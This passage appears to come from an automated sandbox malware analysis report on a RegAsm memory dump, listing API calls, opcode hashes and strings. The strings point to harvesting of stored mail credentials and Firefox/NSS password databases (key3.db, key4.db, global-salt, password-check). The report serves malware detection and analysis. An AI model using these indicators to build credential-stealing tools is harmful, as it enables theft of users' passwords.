                                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                                • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                • API String ID: 1631269929-4153097237
                                                                                                                                                                                                • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                                • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                                                                                                                                                                • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                  • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                                • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                                                                  • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • strings, xrefs: 00408E27
                                                                                                                                                                                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                                • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings
                                                                                                                                                                                                • API String ID: 4036804644-4125592482
                                                                                                                                                                                                • Opcode ID: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                                • Instruction ID: 8088189cea062d7f30cfe1d816b9e84d6c9af13e32ba145f50863190e1f773ff
                                                                                                                                                                                                • Opcode Fuzzy Hash: 93499d40d0ac09f03a262576db3bd02ec7d22a5ce3c652b96661fe7e7ae87012
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B3170B1101722AFD715DB15ED41E733766E7803067124A3FE981972A3CB39E8A1CB9E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                  • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,770145ED,?), ref: 004081B9
                                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: QueryValue$ByteCharFreeLibraryLoadLocalMultiWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                • API String ID: 3974279409-2190619648
                                                                                                                                                                                                • Opcode ID: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                                • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d09f37c226a803f3cefd9e7f18468d8485906a60fce263c12780c476ab64e13
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                • strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                • strlen.MSVCRT ref: 00406BFF
                                                                                                                                                                                                • strlen.MSVCRT ref: 00406C0D
                                                                                                                                                                                                • strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                                                                                                • String ID: key3.db$key4.db
                                                                                                                                                                                                • API String ID: 581844971-3557030128
                                                                                                                                                                                                • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                                • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                • String ID: 0$6
                                                                                                                                                                                                • API String ID: 2300387033-3849865405
                                                                                                                                                                                                • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                                • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                                • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                                • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                • String ID: %s (%s)
                                                                                                                                                                                                • API String ID: 3756086014-1363028141
                                                                                                                                                                                                • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                                • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                                • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                                • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                • String ID: %2.2X
                                                                                                                                                                                                • API String ID: 125969286-791839006
                                                                                                                                                                                                • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                                • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                                • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                • String ID: caption$dialog_%d
                                                                                                                                                                                                • API String ID: 2923679083-4161923789
                                                                                                                                                                                                • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                                • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                                • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                                • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                                • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                                • unknown error, xrefs: 004277B2
                                                                                                                                                                                                • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                                • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                                • API String ID: 3510742995-3035234601
                                                                                                                                                                                                • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                                • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                • API String ID: 2221118986-3608744896
                                                                                                                                                                                                • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                                • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                                  • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmpmemcpy
                                                                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                • API String ID: 1784268899-4153596280
                                                                                                                                                                                                • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                                                • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                                                                • memset.MSVCRT ref: 00410246
                                                                                                                                                                                                • memset.MSVCRT ref: 00410258
                                                                                                                                                                                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3974772901-0
                                                                                                                                                                                                • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                                • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                                • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                                • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                                                • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 577244452-0
                                                                                                                                                                                                • Opcode ID: ac10a7bfd6aa15ede9b4e30c5e41de0da6501438f2188e8c3f6963eddb478c57
                                                                                                                                                                                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                                • Opcode Fuzzy Hash: ac10a7bfd6aa15ede9b4e30c5e41de0da6501438f2188e8c3f6963eddb478c57
                                                                                                                                                                                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                • String ID: imap$pop3$smtp
                                                                                                                                                                                                • API String ID: 2025310588-821077329
                                                                                                                                                                                                • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                • API String ID: 2726666094-3614832568
                                                                                                                                                                                                • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                                • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                                • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1786725549-0
                                                                                                                                                                                                • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                                • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                                • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00406151
                                                                                                                                                                                                  • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                                • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                                • memcmp.MSVCRT ref: 004061A4
                                                                                                                                                                                                • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001C.00000002.518621318.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcmp$memcpy
                                                                                                                                                                                                • String ID: global-salt$password-check
                                                                                                                                                                                                • API String ID: 231171946-3927197501
                                                                                                                                                                                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
